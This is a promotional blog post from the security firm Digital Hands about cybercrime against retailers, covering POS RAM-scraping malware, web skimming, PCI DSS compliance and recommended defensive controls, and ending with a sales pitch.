The annual losses the retail industry sustains due to organized cybercrime is stunning. A recent research report estimates that retail cybercrime costs the industry an eye-watering $30 billion annually. This number is split across a number of sub-sectors, including in-store retail, consumer products manufacturing, online retail, consumer services, and food and beverage.
Retailers are threat actors' top targets, beating out most other industries. Why is that?
First, most employees working for retailers lack awareness of cyber threats. The retail industry ranks last in recognizing and stopping social engineering attacks, making it very easy for cybercriminals to fool employees with phishing emails. Because retail typically employs more young and inexperienced people than most other industries, they are more likely to fall victim.
It doesn’t help that many small retailers still fail to comply with PCI DSS (Payment Card Industry Data Security Standards) requirements when handling credit card transactions. They fail to do so even though there are stiff financial penalties for non-compliance.
Despite being early to adopt cloud storage for their data, only 27% of retailers encrypt the data when they put it in the cloud. A 2018 report highlighted the fact more than half of retailers had experienced some sort of data breach in the past twelve months - an increase of 20% from the previous year. As a result of all of the above, the retail industry is suffering from a crisis of confidence as repeated breaches impact customer loyalty. In a recent survey, 19% of consumers said that they would take their business to another retailer after a breach. A further 35% said that they would take a break from shopping if their credit cards were stolen by cybercriminals following a data breach.
Cybercriminals primarily target the retail industry in two ways. The most common kind of cybercrime against the industry comes in cyberattacks aimed at POS (point-of-sale) systems using retail-specific malware. The malware is designed to record and exfiltrate credit and debit card data from the POS systems as transactions occur.
Retail POS systems are attractive to cybercriminals because of the sheer volume of transactions that pass through them. Plus, many retailers are still not leveraging end-to-end encryption on their terminals. However, cyberattacks against POS systems are dropping due to the payments industry. Increasingly, they are forcing retailers to fulfill PCI compliance requirements and adopt EMV chip technology which makes the card readers less vulnerable to attack.. RAM scraping is still an issue for POS systems, because transactions temporarily stay within the RAM memory of the POS system, special malware placed on the system is able to harvest those transaction and card details before it is deleted. The huge breach at retailer Target is a good example of this, hackers scraped transactions from thousands of customers and harvested their transactions and their credit card information for a long period of time.
With online retailers web skimming is an issue and involves hackers adding malicious code to websites in order to harvest the credit card details of customers as they enter them into the site payment page. Because this kind of attack can be hard to detect unless your business has a strong cybersecurity team who are proactive about reviewing your websites source code and because it can harvest the credit card data from hundreds of simultaneous shoppers, hackers are ramping up their efforts to infiltrate e-commerce sites with this kind of attack.
Slim profit margins across the industry find many retailers struggling to invest in robust cybersecurity measures. Further compounding this is the trend toward digital shopping experiences, which are essential to retailers struggling to compete. Digital shopping experiences require large investments in technology and cybersecurity because of the increase in data digital shopping generates from loyalty programs and the customer profile data these programs store, data which must be protected from hackers.
Because any new adoption of technology almost always brings new cyber risks with it, the digital retail transformation is causing a lot of cybersecurity challenges, especially when retailers put IT before cybersecurity.
By now, most retailers are aware that they are going to have to invest in data privacy. Many are eyeing regulations like GDPR nervously without budgeting for the investment it will require to comply with these incoming regulations. GDPR requires businesses to be more diligent with the way they manage their customers data and to facilitate customer access and customer deletion requests to their data, all of which requires the technology infrastructure to handle the requests.
The Digital Hands team assessed the industry and identified six key domains retailers need to focus on this coming year. Digital Hands is advising our retail customers to prioritize the following key objectives in line with the PCI DSS cybersecurity controls:
Protect Customers Credit & Debit Card Data
Harden IT Infrastructure & Networks
Implement Strong Access & Authentication
Set Up a Program to Manage Vulnerabilities
Regularly Penetration Test Systems & Networks
Implement a Comprehensive Cybersecurity Policy
Digital Hands can help you with the effective implementation of many of these controls, in order to protect your customer data you need to be monitoring your networks, firewalls, and the data storage 24/7 in order to ensure that it is not being accessed by unauthorized personnel. To enable this proactive monitoring you need staff on the ground working shifts to provider monitoring cover and leverage a SIEM to help you make sense of the log data and prioritize alerts for effective alert remediation. Typically these functions would be taken care of by an internal security operations center staffed with your own employees or an external MSSP like Digital Hands who operates multiple security operations centers in the US.
In addition to monitoring, we can help you implement strong access and authentication controls, penetration test your networks and infrastructure to ensure you are not exposed by any vulnerabilities in your infrastructure, and set up a program to manage those vulnerabilities and ensure they are properly remediated by well-trained information security professionals.
We also advise our retail customers to urgently migrate their systems and data to a secure infrastructure platform, implement training programs to teach their loss-prevention staff to recognize cyber threats, immediately encrypt their data at rest, and ensure that they are meeting cybersecurity best practices and regulatory mandates for the industry.
It is also important for large retailers to monitor dark web cybercrime forums where criminals trade their vulnerabilities, pick their retail targets, and sell customers credit card data.
This may seem like an enormous challenge for individual retailers, but retailers are pooling their resources and cybersecurity expertise in order to overcome these challenges. However, this is often hampered by the fact that the industry is highly competitive. Some retailers are unwilling to share cybersecurity resources and knowledge with others in case they reveal their weaknesses.
As with many industries that underinvest in cybersecurity measures, industry participants are playing a game of numbers. They are aware that they will rack up financial losses from cybercrime, but they are hoping that the losses stay within acceptable margins and do not become significant enough to cause major damage.
Digital Hands employs a deeply experienced team of cybersecurity professionals who can help your business get to grips with your cybersecurity risk exposure. We can help you implement controls, detection, and prevention systems to help you protect your organization and retail operations.
If you need a competent security services provider to ensure that you are making the right moves with security, get in touch with Digital Hands today via email (info@digitalhands.com) or by calling us at (813) 229-8324.
About Digital Hands: Recently ranked as one of the Top MSSPs in 2020, Digital Hands is a trusted global cybersecurity leader continuously taking action to protect our customers’ most valuable assets against relentless threats.
Digital Hands is proud to offer extensive security expertise and advanced monitoring and reporting capabilities. Our robust set of innovative cybersecurity services and solutions ensures your organization, customers and employees are defended against cybersecurity attacks and data breaches round the clock.
We are proactive in our response orchestration that includes in-depth analysis and business context. Digital Hands enables our customers to harden their security posture, outmatch bad actors and benefit from our complementary white glove service and excellence in delivery. Our industry – leading customer retention rate and Net Promoter Score of 94 reflects how we go above and beyond every day for our customers.
References:
https://www.businessinsider.com/data-breaches-2018-4/?r=UK/#cheddars-scratch-kitchen-1
https://mashable.com/2018/04/04/every-store-retailer-hacked/